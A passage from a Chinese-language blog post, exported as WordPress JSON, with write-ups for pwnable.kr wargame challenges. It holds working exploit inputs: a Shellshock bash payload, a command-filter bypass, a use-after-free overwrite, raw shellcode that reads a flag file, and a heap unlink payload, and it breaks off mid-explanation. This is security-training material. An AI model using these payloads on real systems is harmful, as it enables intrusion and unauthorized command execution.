{"id":1658,"date":"2021-09-08T21:28:30","date_gmt":"2021-09-08T13:28:30","guid":{"rendered":"https:\/\/flandre-scarlet.moe\/blog\/?p=1658"},"modified":"2021-09-08T21:39:56","modified_gmt":"2021-09-08T13:39:56","slug":"pwnable-kr-%e7%bb%83%e4%b9%a0%ef%bc%88%e4%ba%8c%ef%bc%89","status":"publish","type":"post","link":"https:\/\/flandre-scarlet.moe\/blog\/1658\/","title":{"rendered":"pwnable.kr \u7ec3\u4e60\uff08\u4e8c\uff09"},"content":{"rendered":"<h1>Toddler&#8217;s Bottle<\/h1>\n<h2>leg<\/h2>\n<p>\u5173\u952e\u5728\u4e8e pc \u7684\u8ba1\u7b97\u3002\u4e0d\u50cf x86 \u91cc pc \u603b\u662f\u6307\u5411\u4e0b\u4e00\u6761\u6307\u4ee4\u7684\u5730\u5740\uff0cARM \u4e2d\u7684 pc \u662f\u4e0b\u4e0b\u6761\u3002\u5047\u8bbe\u5f53\u524d\u6307\u4ee4\u5730\u5740\u4e3a x\uff0c\u5373<\/p>\n<ul>\n<li>ARM \u6a21\u5f0f\uff1apc = x + 8<\/li>\n<li>Thumb \u6a21\u5f0f\uff1apc = x + 4<\/li>\n<\/ul>\n<p>\u6309\u8fd9\u4e2a\u89c4\u5219\u8ba1\u7b97\u5f97\u5230 key1() + key2() + key3() = 0x8ce4 + 0x8d0c + 0x8d80 = 0x1A770\uff0c\u8f93\u5165\u5c31\u597d\u4e86<\/p>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">108400<\/pre>\n<h2>mistake<\/h2>\n<p>\u56e0\u4e3a\u8fd0\u7b97\u7b26\u4f18\u5148\u7ea7\u95ee\u9898\uff0cfd \u88ab\u8d4b\u503c\u6210 0\uff0c\u4e5f\u5c31\u662f stdin\uff0c\u548c password \u6587\u4ef6\u5c31\u6ca1\u6709\u5173\u7cfb\u4e86\uff0c\u53ef\u4ee5\u8f93\u5165<\/p>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">1111111111\r\n0000000000<\/pre>\n<p><!--more--><\/p>\n<h2>shellshock<\/h2>\n<p>\u8be5\u9898\u6e90\u81ea bash \u7684\u4efb\u610f\u6307\u4ee4\u6267\u884c\u7684\u5b89\u5168\u6f0f\u6d1e\uff0c\u6458\u81ea<a href=\"https:\/\/en.wikipedia.org\/wiki\/Shellshock_(software_bug)\" rel=\"noopener\" target=\"_blank\">\u7ef4\u57fa\u767e\u79d1<\/a><\/p>\n<blockquote><p>\nInitial report (CVE-2014-6271)<br \/>\nThis original form of the vulnerability (CVE-2014-6271) involves a specially crafted environment variable containing an exported function definition, followed by arbitrary commands. Bash incorrectly executes the trailing commands when it imports the function.[33] The vulnerability can be tested with the following command:<br \/>\nenv x='() { :;}; echo vulnerable&#8217; bash -c &#8220;echo this is a test&#8221;<br \/>\nIn systems affected by the vulnerability, the above commands will display the word &#8220;vulnerable&#8221; as a result of Bash executing the command &#8220;echo vulnerable&#8221;, which was embedded into the specially crafted environment variable named &#8220;x&#8221;.[8][34]<\/p><\/blockquote>\n<pre class=\"brush: bash; title: ; notranslate\" title=\"\">env x='() { :;}; \/bin\/cat flag'  .\/shellshock<\/pre>\n<h2>coin1<\/h2>\n<p>\u6bd4\u8f83\u5355\u7eaf\u7684\u7b97\u6cd5\u9898\uff1f\u6309\u9898\u76ee\u8981\u6c42\u7684\u505a\u5c31\u884c\u4e86\uff0c\u7528 pwntools \u5904\u7406\u8f93\u5165\u8f93\u51fa\uff0c\u6700\u540e\u518d ssh \u4e0a\u53bb\u8dd1\u4e00\u4e0b jio \u672c<\/p>\n<pre class=\"brush: python; title: ; notranslate\" title=\"\">from pwn import *\r\nimport re\r\n\r\ndef weigh(conn, s, e):\r\n    coin_list = &#x5B;str(i) for i in range(s, e+1)]  # &#x5B;s, e]\r\n    s = &quot; &quot;.join(coin_list).encode()\r\n    conn.sendline(s)\r\n    output = conn.recvline().decode()\r\n    result = re.search(&quot;(\\d+)&quot;, output).groups()\r\n    assert(len(result) &gt; 0)\r\n    return int(result&#x5B;0])\r\n\r\ndef guess(conn, N, C):\r\n    s = 0\r\n    e = N-1\r\n    for i in range(C):\r\n        m = int((s + e) \/ 2)\r\n        # print('s:', s, &quot;,e:&quot;, e, &quot;,m:&quot;, m)\r\n        w = weigh(conn, s, m)\r\n        # print(&quot;w:&quot;, w)\r\n        if w == (m - s + 1) * 10: # all real\r\n            s = m + 1\r\n        else:\r\n            e = m\r\n    return (int)((s + e) \/ 2)\r\n\r\ndef main():\r\n    # setup conn\r\n    context.log_level = 'debug'\r\n    conn = remote('pwnable.kr', 9007)\r\n    conn.recvuntil('Ready')\r\n    while True:\r\n        output = conn.recvline_regex('N=(\\d+) C=(\\d+)').decode()\r\n        n, c = re.search('N=(\\d+) C=(\\d+)', output).groups()\r\n        answer = guess(conn, int(n), int(c))\r\n        conn.sendline(str(answer).encode())\r\n        conn.recvuntil('Correct!')\r\n    \r\nmain()<\/pre>\n<h2>blackjack<\/h2>\n<p>\u7ed9\u4e86\u4e00\u4e2a\u6e90\u7801\u7684\u7f51\u9875\uff0c\u7f51\u9875\u5df2\u7ecf\u5931\u6548\u4e86\uff0c\u4f46\u662f\u53ef\u4ee5\u5728<a href=\"https:\/\/web.archive.org\/web\/20201026050544\/http:\/\/cboard.cprogramming.com\/c-programming\/114023-simple-blackjack-program.html\" rel=\"noopener\" target=\"_blank\">\u7f51\u7ad9\u65f6\u5149\u673a<\/a>\u4e0a\u627e\u5230\uff0c\u7136\u540e\u5728\u8fd9\u5768\u4ee3\u7801\u91cc\u7ffb\u554a\u7ffb\uff0c\u4f60\u5c31\u4f1a\u770b\u5230\u6709\u95ee\u9898\u7684\u51fd\u6570<\/p>\n<pre class=\"brush: cpp; title: ; notranslate\" title=\"\">int betting() { \/\/Asks user amount to bet\r\n  printf(&quot;\\n\\nEnter Bet: $&quot;);\r\n  scanf(&quot;%d&quot;, &amp;bet);\r\n  if (bet &gt; cash) { \/\/If player tries to bet more money than player has\r\n    printf(&quot;\\nYou cannot bet more money than you have.&quot;);\r\n    printf(&quot;\\nEnter Bet: &quot;);\r\n    scanf(&quot;%d&quot;, &amp;bet);\r\n    return bet;\r\n  }\r\n  else\r\n    return bet;\r\n} \/\/ End Function<\/pre>\n<p>\u53ef\u4ee5\u770b\u5230\u7b2c\u4e8c\u6b21\u8f93\u5165\u7684 bet \u6ca1\u6709\u4f5c\u6821\u9a8c\u5c31\u8fd4\u56de\u4e86\u3002\u6240\u4ee5\u5728\u8fdb\u5165\u6e38\u620f\u540e bet \u76f4\u63a5\u8f93\u5165 1000000\uff0c\u5224\u65ad\u5931\u8d25\u540e\u518d\u8f93\u4e00\u6b21 1000000\uff0c\u8d62\u4e86\u5c31\u597d\u4e86\u3002\u8f93\u5165 -1000000\uff0c\u7136\u540e\u8f93\u6389\u4e5f\u884c\u2026\u2026<\/p>\n<h2>lotto<\/h2>\n<p>\u867d\u7136\u89c4\u5219\u8bf4\u5f97\u6bd4\u8f83\u7384\u4e4e\uff0c\u4f46\u662f\u4ee3\u7801\u7684\u4e24\u4e2a for \u5faa\u73af\u8fd8\u662f\u66b4\u9732\u4e86\u2026\u2026\u4e00\u5f00\u59cb\u8fd8\u60f3\u7740 urandom \u91cc\u6709\u6ca1\u6709\u4ec0\u4e48 bug\u3002\u53ea\u8981\u4f60\u7684\u8f93\u5165\u80fd\u62bc\u5bf9\u968f\u673a\u51fa\u7684\u516d\u4e2a\u5b57\u8282\u4e2d\u7684\u4e00\u4e2a\u5c31\u80fd\u8fc7\u5173\uff0c\u5e76\u4e14\u503c\u7684\u8303\u56f4\u5df2\u7ecf\u7f29\u5c0f\u5230\u4e86 1~45\uff0c\u6240\u4ee5\u76f4\u63a5\u8bd5\u51e0\u6b21\u5c31\u597d\u4e86\u2026\u2026<\/p>\n<pre class=\"brush: cpp; title: ; notranslate\" title=\"\">int match = 0, j = 0;\r\nfor(i=0; i&lt;6; i++){\r\n  for(j=0; j&lt;6; j++){\r\n    if(lotto&#x5B;i] == submit&#x5B;j]){\r\n      match++;\r\n    }\r\n  }\r\n}<\/pre>\n<pre class=\"brush: python; title: ; notranslate\" title=\"\">from pwn import *\r\nimport re\r\n\r\ncontext.log_level = 'debug'\r\nconn = process('\/home\/lotto\/lotto')\r\nconn.recvuntil('3. Exit')\r\nwhile True:\r\n    conn.sendline('1')\r\n    conn.recvuntil('Submit your 6 lotto bytes :')\r\n    conn.send(' '*6) # 6 \u500d\u7684\u5feb\u4e50\r\n    conn.recvuntil('bad luck...')<\/pre>\n<h2>cmd1<\/h2>\n<pre class=\"brush: cpp; title: ; notranslate\" title=\"\">#include &lt;stdio.h&gt;\r\n#include &lt;string.h&gt;\r\nint filter(char* cmd){\r\n        int r=0;\r\n        r += strstr(cmd, &quot;flag&quot;)!=0;\r\n        r += strstr(cmd, &quot;sh&quot;)!=0;\r\n        r += strstr(cmd, &quot;tmp&quot;)!=0;\r\n        return r;\r\n}\r\nint main(int argc, char* argv&#x5B;], char** envp){\r\n        putenv(&quot;PATH=\/thankyouverymuch&quot;);\r\n        if(filter(argv&#x5B;1])) return 0;\r\n        system( argv&#x5B;1] );\r\n        return 0;\r\n}<\/pre>\n<p>\u968f\u4fbf\u8dd1\u5230 \/tmp \u4e0b <\/p>\n<pre class=\"brush: bash; title: ; notranslate\" title=\"\">ln -s \/home\/cmd1\/flag f<\/pre>\n<p> \u521b\u5efa\u4e00\u4e2a\u7b26\u53f7\u94fe\u63a5\uff0c\u7136\u540e <\/p>\n<pre class=\"brush: bash; title: ; notranslate\" title=\"\">~\/cmd1 &quot;\/bin\/cat f&quot;<\/pre>\n<p>\u5c31\u597d\u4e86\u2026\u2026<\/p>\n<h2>cmd2<\/h2>\n<pre class=\"brush: cpp; title: ; notranslate\" title=\"\">#include &lt;stdio.h&gt;\r\n#include &lt;string.h&gt;\r\nint filter(char* cmd){\r\n        int r=0;\r\n        r += strstr(cmd, &quot;=&quot;)!=0;\r\n        r += strstr(cmd, &quot;PATH&quot;)!=0;\r\n        r += strstr(cmd, &quot;export&quot;)!=0;\r\n        r += strstr(cmd, &quot;\/&quot;)!=0;\r\n        r += strstr(cmd, &quot;`&quot;)!=0;\r\n        r += strstr(cmd, &quot;flag&quot;)!=0;\r\n        return r;\r\n}\r\nextern char** environ;\r\nvoid delete_env(){\r\n        char** p;\r\n        for(p=environ; *p; p++) memset(*p, 0, strlen(*p));\r\n}\r\nint main(int argc, char* argv&#x5B;], char** envp){\r\n        delete_env();\r\n        putenv(&quot;PATH=\/no_command_execution_until_you_become_a_hacker&quot;);\r\n        if(filter(argv&#x5B;1])) return 0;\r\n        printf(&quot;%s\\n&quot;, argv&#x5B;1]);\r\n        system( argv&#x5B;1] );\r\n        return 0;\r\n}<\/pre>\n<p>\u6bd4\u8d77 1 \u91cc\u66f4\u8fdb\u4e00\u6b65\uff0c\u76f4\u63a5\u5220\u9664\u4e86\u8fdb\u7a0b\u4e2d\u6240\u6709\u73af\u5883\u53d8\u91cf\uff0c\u8fd9\u5c31\u5bfc\u81f4\u5fc5\u987b\u7528\u5230\u8def\u5f84\u5206\u9694\u7b26\u3002\u800c\u4ee3\u7801\u91cc\u53c8\u9650\u5236\u4e86\u76f4\u63a5\u4f20\u5165 &#8216;\/&#8217;\uff0c\u6240\u4ee5\u5c31\u8981\u8003\u8651\u8f6c\u4e49\u5b57\u7b26\u4e4b\u7c7b\u3002\u53ef\u4ee5\u5c06 &#8216;\/&#8217; \u7f16\u7801\u540e\u5229\u7528 printf \u8f93\u51fa\u3002\u540c\u4e0a\uff0c\u5148\u5230 \/tmp \u4e0b\u9762\u65b0\u5efa\u4e00\u4e2a flag \u6587\u4ef6\u7684\u7b26\u53f7\u94fe\u63a5<\/p>\n<pre class=\"brush: bash; title: ; notranslate\" title=\"\">~\/cmd2 &quot;\\$(printf '&#92;&#48;57bin&#92;&#48;57cat &#92;&#48;57tmp&#92;&#48;57subdir&#92;&#48;57f')&quot;<\/pre>\n<p>\u5176\u4e2d \\057 \u5c31\u662f &#8216;\/&#8217; \u7684\u516b\u8fdb\u5236\u7f16\u7801\uff0c\u540c\u65f6\u5728 $ \u524d\u9762\u52a0\u4e0a\u53cd\u659c\u6760\uff0c\u8fd9\u6837 $ \u5c31\u80fd\u5728\u7b2c\u4e00\u6b21\u6267\u884c\u65f6\u4fdd\u7559\u4e0b\u6765\u3002<\/p>\n<h2>uaf<\/h2>\n<p>\u770b\u4e0a\u53bb\u4e0d\u662f\u5806\u6ea2\u51fa\u7684\u3002\u90a3\u4e48\u5c31\u8981\u5148\u91ca\u653e\u6389\u5bf9\u8c61 m \u548c w\uff0c\u7136\u540e\u518d\u7ed9 data \u5206\u914d\u5185\u5b58\uff0c\u8ba9 data \u7684\u5730\u5740\u548c m \u7684\u5730\u5740\u4e00\u81f4\uff0c\u7136\u540e\u89e6\u53d1 m->introduce() \u5373\u53ef\u3002<br \/>\n\u5f53\u7136\uff0c\u4e5f\u8981\u6784\u9020 data \u7684\u5185\u5bb9\uff0c\u5177\u4f53\u5c31\u4ece\u865a\u8868\u4e0b\u624b\u4e86\u3002<br \/>\n\u6587\u4ef6\u4e2d\u5206\u914d\u7ed9 m \u7684\u7a7a\u95f4\u662f 0x18 \u5b57\u8282\uff0c\u6d4b\u8bd5\u4e86\u4e00\u4e0b\u53d1\u73b0\u5206\u914d data \u65f6\u53ea\u8981\u5927\u5c0f\u4e0d\u8d85\u8fc7 0x18\uff0cnew \u4e24\u6b21\u5f97\u5230\u7684\u5730\u5740\u5c31\u548c m \u76f8\u540c\uff08\u5f53\u7136 m \u9700\u8981\u5148 delete\uff09\u3002\u7b2c\u4e00\u6b65\u5b8c\u6210\u3002<br \/>\n\u8c03\u7528 m->introduce() \u65f6\u4f1a\u5148\u4ece *m \u5904\u53d6\u5230\u865a\u8868\u7684\u5730\u5740\uff0c\u67e5\u770b\u7c7b\u7684\u5b9a\u4e49\uff0cintroduce \u51fd\u6570\u662f\u8868\u4e2d\u7684\u7b2c\u4e8c\u9879\uff0c\u90a3\u4e48\u5b9e\u9645\u4e0a\u5c31\u4f1a\u5148\u53d6\u5f97 *m\uff08\u5373 Man \u7c7b\u7684\u865a\u8868\u5730\u5740\uff09\uff0c\u7136\u540e\u53d6 *m + sizeof(void*) * 2 \u4f5c\u4e3a introduce \u51fd\u6570\u7684\u5730\u5740\u3002\u6240\u4ee5\u6211\u4eec\u628a\u6307\u5411\u865a\u8868\u7684\u5730\u5740\u5f80\u524d\u632a\u4e00\u4e0b\uff0c\u5c31\u4f1a\u53d8\u6210 (*m &#8211; sizeof(void*)) + sizeof(void*) * 2\uff0c\u4ee5\u4e3a\u8c03\u7528 introduce \u5c31\u4f1a\u8c03\u5230 give_shell\uff0c\u56e0\u4e3a give_shell \u51fd\u6570\u662f\u8868\u4e2d\u7b2c\u4e00\u9879\u3002\u800c *m \u56fa\u5b9a\u4e3a 0x401570\uff0c\u6240\u4ee5\u586b\u5165 0x401568 \u5c31\u884c\u4e86\u3002<\/p>\n<pre class=\"brush: bash; title: ; notranslate\" title=\"\">printf &quot;\\x68\\x15\\x40\\x00&quot; &gt; \/tmp\/in.txt\r\n.\/uaf 24 \/tmp\/in.txt\r\n3  \/\/ \u89e6\u53d1 delete\r\n2\r\n2  \/\/ \u4e24\u6b21 new\r\n1  \/\/ \u8c03\u7528 &quot;introduce&quot;<\/pre>\n<h2>memcpy<\/h2>\n<p>\u7167\u7740\u63d0\u793a\u8bd5\u4e00\u904d\uff0c\u53d1\u73b0\u7a0b\u5e8f\u4f1a\u5d29\u6e83\u3002\u68c0\u67e5\u4e00\u4e0b\u53ef\u4ee5\u53d1\u73b0\u662f sse \u6307\u4ee4\u9047\u5230\u975e 16 \u5b57\u8282\u5bf9\u9f50\u7684\u5185\u5b58\u5730\u5740\u65f6\u5f15\u8d77\u7684\u3002\u6240\u4ee5\u8981\u6c42 malloc \u51fa\u6765\u7ed9 dest \u7684\u5730\u5740 16 \u5b57\u8282\u5bf9\u9f50\u3002\u6e90\u7801\u5f00\u5934\u8d34\u5fc3\u7684\u7ed9\u51fa\u4e86\u7f16\u8bd1\u9009\u9879\uff0c\u7167\u7740\u7f16\u4e00\u4e2a\u4e8c\u8fdb\u5236\u51fa\u6765\u8bd5\u4e00\u8bd5\u5c31\u884c\u3002\u6bd4\u5982\u7b2c 4 \u6b21\u5206\u914d 64 \u5b57\u8282\u65f6\u662f\u5bf9\u9f50\u7684\uff0c\u7b2c 5 \u6b21\u5206\u914d 128 \u5b57\u8282\u65f6\u5c31\u4e0d\u5bf9\u9f50\u4e86\uff08\u53d1\u73b0\u591a\u4f59\u4e86 8 \u5b57\u8282\uff09\uff0c\u90a3\u4e48\u7b2c 4 \u6b21\u5c31\u5206\u914d 64+8 \u5b57\u8282\uff0c\u56e0\u4e3a\u5806\u9700\u8981\u591a\u5206\u914d 8 \u5b57\u8282\u4fdd\u7559\u63a7\u5236\u4fe1\u606f\uff0c\u540e\u9762\u4ee5\u6b64\u7c7b\u63a8<\/p>\n<pre class=\"brush: bash; title: ; notranslate\" title=\"\">8\r\n16\r\n32\r\n72\r\n136\r\n264\r\n520\r\n1032\r\n2056\r\n4096<\/pre>\n<h2>asm<\/h2>\n<p>\u53ea\u4f7f\u7528 open read write \u51fd\u6570\uff0c\u5199 shellcode \u8bfb flag \u6587\u4ef6\u3002<br \/>\n\u53ef\u7528\u7684\u5185\u5b58\u7a7a\u95f4\u56fa\u5b9a\u4e3a 0x41414000~0x41415000\u3002<br \/>\nshellcode \u7684\u5199\u5165\u8303\u56f4\u4e3a 0x4141402e~0x41414416\uff08\u4ee3\u7801\u4e2d\u5199\u6b7b\u7684 1000 \u5b57\u8282\u8bfb\u53d6\u957f\u5ea6\uff09<br \/>\n\u6587\u4ef6\u540d\u7684\u5b57\u7b26\u4e32\u53ef\u4ee5\u7d27\u8ddf\u7740 shellcode\uff0c\u4e0d\u8fc7\u9700\u8981\u6839\u636e\u6700\u540e\u5199\u5b8c\u7684 shellcode \u8c03\u6574\u5b57\u7b26\u4e32\u504f\u79fb<\/p>\n<pre class=\"brush: cpp; title: ; notranslate\" title=\"\">\/\/ \u5b9e\u9645\u8fde\u5230 nc 0 9026 \u65f6\u8def\u5f84\u8981\u6539\u6210 &quot;\/home\/asm_pwn\/...&quot;\r\nchar* ppath = \/\/ \u592a\u9e21\u513f\u957f\u4e86\uff0c\u6298\u4e00\u4e0b\r\n  &quot;\/home\/asm\/this_is_pwnable.kr_flag_file_please_read_this_file.sorry_&quot;\r\n  &quot;the_file_name_is_very_looooooooooooooooooooooooooooooooooooooooooooooo&quot;\r\n  &quot;ooooooooooooooooooooooooooooo0000000000000000000000000oooooooooooooooo&quot;\r\n  &quot;ooooooo000000000000o0o0o0o0o0o0ong&quot;; \r\n__asm__ __volatile__ (\r\n    &quot;mov $2, %%rax\\n&quot;\r\n    &quot;mov %0, %%rdi\\n&quot;\r\n    &quot;mov $0, %%rsi\\n&quot;\r\n    &quot;syscall\\n&quot;      \/\/ open \u7684\u7cfb\u7edf\u8c03\u7528\uff0cppath \u5c31\u662f\u6587\u4ef6\u8def\u5f84\uff0c\u5b9e\u9645\u5b57\u7b26\u4e32\u7d27\u8ddf\u5728 shellcode \u540e\u9762\r\n    &quot;mov %%rax, %%rdi\\n&quot;\r\n    &quot;mov $0, %%rax\\n&quot;\r\n    &quot;mov $0x41414400, %%rsi\\n&quot;\r\n    &quot;mov $100, %%rdx\\n&quot;\r\n    &quot;syscall\\n&quot;       \/\/ read\uff0c\u8bfb 100 \u5b57\u8282\u5230 0x41414400 \u8fd9\u4e2a\u7f13\u51b2\u533a\r\n    &quot;mov $1, %%rax\\n&quot;\r\n    &quot;mov $1, %%rdi\\n&quot;\r\n    &quot;mov $0x41414400, %%rsi\\n&quot;\r\n    &quot;mov $100, %%rdx\\n&quot;\r\n    &quot;syscall\\n&quot;      \/\/ write\uff0c\u8f93\u51fa\u5230 stdout\r\n    ::&quot;c&quot;(ppath));<\/pre>\n<p>\u6bd4\u8f83\u64cd\u86cb\u7684\u662f\u5728 asm \u76ee\u5f55\u4e0b\u901a\u8fc7\uff08.\/asm < 1.txt\uff09\u5df2\u7ecf\u6210\u529f\u4e86\u4f46\u6362\u5230 nc 0 9026 \u6539\u7528 pwntools \u811a\u672c\u5374\u6ca1\u6210\u529f\uff0c\u641e\u6765\u641e\u53bb\u6700\u540e\u7528\u7ba1\u9053\u53ef\u4ee5\u4e86\u2026\u2026\n\u4e0b\u9762\u7684\u5b57\u8282\u7801\u5bf9\u5e94\u4e0a\u9762\u7684\u6c47\u7f16\uff0c\n\n<pre>\\x2F\\x68\\x6F<\/pre>\n<p> \u5f00\u59cb\u5c31\u662f\u8def\u5f84\u5b57\u7b26\u4e32\u5185\u5bb9\uff0c\u8c03\u7528 open \u65f6\u9700\u8981\u8bbe rdi \u4e3a\u5b57\u7b26\u4e32\u5730\u5740\uff0c\u524d\u9762\u8bf4\u5230 shellcode \u4ece 0x4141402e \u5f00\u59cb\uff0c\u8fd9\u6837\u5c31\u80fd\u7b97\u51fa\u5b57\u7b26\u4e32\u5b9e\u9645\u4f4d\u7f6e\u5728\u54ea\u3002<\/p>\n<pre class=\"brush: bash; title: ; notranslate\" title=\"\">python -c 'print(&quot;\\x48\\x8D\\x05\\x57\\x00\\x00\\x00\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x48\\x89\\xC1\\x48\\xC7\\xC0\\x02\\x00\\x00\\x00\\x48\\x89\\xCF\\x48\\xC7\\xC6\\x00\\x00\\x00\\x00\\x0F\\x05\\x48\\x89\\xC7\\x48\\xC7\\xC0\\x00\\x00\\x00\\x00\\x48\\xC7\\xC6\\x00\\x44\\x41\\x41\\x48\\xC7\\xC2\\x64\\x00\\x00\\x00\\x0F\\x05\\x48\\xC7\\xC0\\x01\\x00\\x00\\x00\\x48\\xC7\\xC7\\x01\\x00\\x00\\x00\\x48\\xC7\\xC6\\x00\\x44\\x41\\x41\\x48\\xC7\\xC2\\x64\\x00\\x00\\x00\\x0F\\x05\\xCC\\x2F\\x68\\x6F\\x6D\\x65\\x2F\\x61\\x73\\x6D\\x5F\\x70\\x77\\x6E\\x2F\\x74\\x68\\x69\\x73\\x5F\\x69\\x73\\x5F\\x70\\x77\\x6E\\x61\\x62\\x6C\\x65\\x2E\\x6B\\x72\\x5F\\x66\\x6C\\x61\\x67\\x5F\\x66\\x69\\x6C\\x65\\x5F\\x70\\x6C\\x65\\x61\\x73\\x65\\x5F\\x72\\x65\\x61\\x64\\x5F\\x74\\x68\\x69\\x73\\x5F\\x66\\x69\\x6C\\x65\\x2E\\x73\\x6F\\x72\\x72\\x79\\x5F\\x74\\x68\\x65\\x5F\\x66\\x69\\x6C\\x65\\x5F\\x6E\\x61\\x6D\\x65\\x5F\\x69\\x73\\x5F\\x76\\x65\\x72\\x79\\x5F\\x6C\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x30\\x30\\x30\\x30\\x30\\x30\\x30\\x30\\x30\\x30\\x30\\x30\\x30\\x30\\x30\\x30\\x30\\x30\\x30\\x30\\x30\\x30\\x30\\x30\\x30\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x6F\\x30\\x30\\x30\\x30\\x30\\x30\\x30\\x30\\x30\\x30\\x30\\x30\\x6F\\x30\\x6F\\x30\\x6F\\x30\\x6F\\x30\\x6F\\x30\\x6F\\x30\\x6F\\x6E\\x67\\x00\\x0a&quot;)' &gt; \/tmp\/1.txt\r\ncat \/tmp\/1.txt - | nc 0 9026<\/pre>\n<h2>unlink<\/h2>\n<p>\u5806\u6ea2\u51fa\u3002<\/p>\n<pre class=\"brush: cpp; title: ; notranslate\" title=\"\">#include &lt;stdio.h&gt;\r\n#include &lt;stdlib.h&gt;\r\n#include &lt;string.h&gt;\r\ntypedef struct tagOBJ{\r\n    struct tagOBJ* fd;\r\n    struct tagOBJ* bk;\r\n    char buf&#x5B;8];\r\n}OBJ;\r\n\r\nvoid shell(){\r\n    system(&quot;\/bin\/sh&quot;);\r\n}\r\n\r\nvoid unlink(OBJ* P){\r\n    OBJ* BK;\r\n    OBJ* FD;\r\n    BK=P-&gt;bk;\r\n    FD=P-&gt;fd;\r\n    FD-&gt;bk=BK;\r\n    BK-&gt;fd=FD;\r\n}\r\n\r\nint main(int argc, char* argv&#x5B;]){\r\n    malloc(1024);\r\n    OBJ* A = (OBJ*)malloc(sizeof(OBJ));\r\n    OBJ* B = (OBJ*)malloc(sizeof(OBJ));\r\n    OBJ* C = (OBJ*)malloc(sizeof(OBJ));\r\n\r\n    \/\/ double linked list: A &lt;-&gt; B &lt;-&gt; C\r\n    A-&gt;fd = B;\r\n    B-&gt;bk = A;\r\n    B-&gt;fd = C;\r\n    C-&gt;bk = B;\r\n\r\n    printf(&quot;here is stack address leak: %p\\n&quot;, &amp;A);\r\n    printf(&quot;here is heap address leak: %p\\n&quot;, A);\r\n    printf(&quot;now that you have leaks, get shell!\\n&quot;);\r\n    \/\/ heap overflow!\r\n    gets(A-&gt;buf);\r\n    \r\n    \/\/ exploit this unlink!\r\n    unlink(B);\r\n    return 0;\r\n}<\/pre>\n<p>\u56e0\u4e3a unlink \u65f6\u4f1a\u64cd\u4f5c\u94fe\u8868\u7684\u524d\u5411\u548c\u540e\u5411\u8282\u70b9\uff0c\u90a3\u4e48\u4e0d\u7ba1\u6211\u628a BK \u8fd8\u662f FD \u8c03\u6574\u4e3a shell \u51fd\u6570\u7684\u5730\u5740\u90fd\u4f1a\u5728 FD->bk=BK \u548c BK->fd=FD \u4e4b\u4e00\u89e6\u53d1\u5199\u5165\u5f02\u5e38\uff0c\u56e0\u4e3a\u4ee3\u7801\u6bb5\u662f\u4e0d\u53ef\u5199\u7684\u3002\u628a\u5b83\u4eec\u5199\u6210\u5806\u7f13\u51b2\u533a\u518d\u5efa\u7acb\u8df3\u677f\u7684 shellcode \u4e5f\u4e0d\u884c\uff0c\u56e0\u4e3a\u6709 dep\u3002\u3002\u3002\u8fd9\u91cc\u5361\u4e86\u597d\u4e45\u3002\u3002\u3002\u6bd5\u7adf\u4ee3\u7801\u91cc\u80fd\u52ab\u6301\u7684\u53ea\u6709 unlink \u7684 ret \u4e86\u3002\u540e\u6765\u624d\u60f3\u5230 main \u51fd\u6570\u7684 ret \u4e5f\u53ef\u4ee5\u505a\u624b\u811a\u3002<\/p>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\"> ; main \u4e2d\u8c03\u7528 unlink \u7684\u5730\u65b9\r\n 0x080485ef &lt;+192&gt;:   pushl  -0xc(%ebp)\r\n 0x080485f2 &lt;+195&gt;:   call   0x8048504 &lt;unlink&gt;\r\n 0x080485f7 &lt;+200&gt;:   add    $0x10,%esp\r\n 0x080485fa &lt;+203&gt;:   mov    $0x0,%eax\r\n 0x080485ff &lt;+208&gt;:   mov    -0x4(%ebp),%ecx\r\n 0x08048602 &lt;+211&gt;:   leave\r\n 0x08048603 &lt;+212&gt;:   lea    -0x4(%ecx),%esp\r\n 0x08048606 &lt;+215&gt;:   ret<\/pre>\n<p>\u4ece unlink \u8fd4\u56de\u540e\u7ed5\u5708\u5b50\u628a ebp \u8d4b\u503c\u7ed9\u4e86 esp \u7136\u540e ret\uff0c\u800c\u8fd9\u4e2a ebp \u5728\u8c03\u7528 unlink \u65f6\u4f1a\u4fdd\u5b58\u5230\u6808\u4e0a\uff0c\u5c31\u6709\u673a\u4f1a\u53ef\u4ee5\u4fee\u6539\u5b83\u4e86\u3002\u4e09\u4e2a obj \u5bf9\u8c61 A B C \u5728\u5806\u4e0a\u7684\u5e03\u5c40\u662f\u8fde\u7eed\u7684<\/p>\n<pre>0    4    8       16       24\r\n+----+----+--------+--------+----\r\n| fd | bk | buf    | &lt;heap&gt; | fd\r\n+----+----+--------+--------+----<\/pre>\n<p>payload \u4ece A \u7684 buf \u5f00\u59cb\u7b97<\/p>\n<pre>A+0x8  AAAA\r\nA+0xc  AAAA\r\nA+0x10 AAAA\r\nA+0x14 AAAA\r\nA+0x18 &lt;A\u7684\u5806\u5730\u5740+0x28&gt;    \/\/ OBJ \u5bf9\u8c61 B\uff0c\u540c\u65f6\u4e5f\u662f B \u7684 fd\r\nA+0x1c &lt;A\u7684\u6808\u5730\u5740-0x1c&gt;\r\nA+0x20 \\xeb\\x84\\x04\\x08\r\nA+0x24 &lt;A\u7684\u5806\u5730\u5740+0x24&gt;\r\nA+0x28 &lt;A\u7684\u5806\u5730\u5740+0x24&gt;<\/pre>\n<p>A\u7684\u6808\u5730\u5740\u51cf\u53bb 0x1c \u6b63\u597d\u5c31\u662f unlink \u51fd\u6570\u4e2d main \u7684 ebp \u4fdd\u5b58\u7684\u4f4d\u7f6e\uff0c\\xeb\\x84\\x04\\x08 \u662f shell 